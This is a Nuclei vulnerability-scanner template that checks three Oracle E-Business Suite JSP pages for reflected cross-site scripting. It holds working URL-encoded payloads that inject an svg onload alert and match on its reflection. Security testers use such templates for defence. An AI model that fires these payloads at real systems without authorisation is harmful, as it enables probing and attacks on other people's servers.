nuclei-templates/vulnerabilities/oracle/oracle-ebs-xss.yaml

id: oracle-ebs-xss

info:
  name: Oracle EBS XSS
  author: dhiyaneshDk
  severity: medium
  tags: oracle,xss,ebs
  reference:
    - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf
    - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf
    - http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf

requests:
  - method: GET
    path:
      - "{{BaseURL}}/OA_HTML/jtfLOVInProcess.jsp%3FAAA%3DAAAAAAAAAA%27%22%3E%3Csvg%2Fonload%3Dalert('{{randstr}}')%3E"
      - "{{BaseURL}}/OA_HTML/oksAutoRenewalHelp.jsp%3Fthanks%3D%27%22%3E%3Csvg%2Fonload%3Dalert('{{randstr}}')%3E"
      - "{{BaseURL}}/OA_HTML/ieuiMeetingErrorDisplay.jsp%3FErrCode%3D%27%22%3E%3Csvg%2Fonload%3Dalert('{{randstr}}')%3E"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<svg/onload=alert('{{randstr}}')>"
        part: body

      - type: status
        status:
          - 200
      - type: word
        words:
          - "text/html"
        part: header